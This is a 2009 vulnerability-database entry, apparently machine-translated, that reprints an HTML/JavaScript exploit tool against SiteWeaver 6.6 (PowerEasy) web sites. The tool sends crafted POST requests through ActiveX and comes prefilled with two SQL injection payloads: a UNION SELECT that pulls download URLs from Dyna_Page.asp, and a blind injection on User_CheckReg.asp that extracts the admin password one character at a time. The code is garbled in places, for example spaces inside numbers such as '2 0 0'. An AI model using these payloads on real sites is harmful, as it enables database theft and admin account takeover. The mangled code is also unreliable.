Move-SiteWeaver6. 6 version the latest exploit tool-vulnerability warning-the black bar safety net

2009-02-20T00:00:00
ID MYHACK58:62200922229
Type myhack58
Reporter 佚名
Modified 2009-02-20T00:00:00

Description

Reprinted from the hacker Defense

The original author is Cschii

<script> function gb2utf8(data){ var glbEncode = []; gb2utf8_data = data; execScript("gb2utf8_data = MidB(gb2utf8_data, 1)", "VBScript"); var t=escape(gb2utf8_data). replace(/%u/g,""). replace(/(. {2})(. {2})/g,"%$2%$1"). replace(/%([A-Z].)% (. {2})/g,"@$1$2"); t=t. split("@"); var i=0,j=t. length,k; while(++i<j) { k=t[i]. substring(0,4); if(! glbEncode[k]) { gb2utf8_char = eval("0x"+k); execScript("gb2utf8_char = Chr(gb2utf8_char)", "VBScript"); glbEncode[k]=escape(gb2utf8_char). substring(1,6); } t[i]=glbEncode[k]+t[i]. substring(4); } gb2utf8_data = gb2utf8_char = null; return unescape(t. join("%")); }

function PostData(){ var url = document. getElementById("url"). value; var post= document. getElementById("post"). value; var oXmlHttp = new ActiveXObject("Microsoft. XMLHTTP"); oXmlHttp. open("POST", url, false); if (url. indexOf("User_CheckReg. asp")>0){oXmlHttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded");} oXmlHttp. send(post); var GetResult=gb2utf8(oXmlHttp. responseBody); if (oXmlHttp. readyState == 4) { if (oXmlHttp. status == 2 0 0) { document. getElementById("getResult"). value = GetResult; } } } function Inject(i){ if (i==1){ document. getElementById("url"). value="http://127.0.0.1:81/pe2006/Dyna_Page.asp"; document. getElementById("post"). value='<? xml version="1.0" encoding="gb2312"?& gt;<root><id>2 1</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1,5 2 from PE_soft where softid=1/1</value></root>'; } else { document. getElementById("url"). value="http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp"; document. getElementById("post"). value="UserName=admino'%20union%20select%2 0 1%20from%20pe_admin%20where%20username='admin'band%20Mid(password,1,1)>'0"; } }

</script> <BODY> <div align="center">action-SiteWeaver6. 6 version the latest exploit tool</div> Please enter the URL:<br> <INPUT TYPE="text" id="url" value="http://127.0.0.1:81/pe2006/Dyna_Page.asp" style="width:9 0%;"> <br> Input Post:<br> <textArea id="post" style="width:9 0%; height:8 0;"><? xml version="1.0" encoding="gb2312"?& gt; <root><id>2 1</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1,5 2 from PE_soft where softid=1/1</value></root></textArea> <div align="center"><INPUT TYPE="button" value="the vulnerability is an example" > <INPUT TYPE="button" value=" submit " > <INPUT TYPE="button" value="vulnerability in the second example" ></div> <hr size=2 > Injection results:<br> <textArea id="getResult" style="width:9 0%; height:2 0 0;"></textArea> </BODY>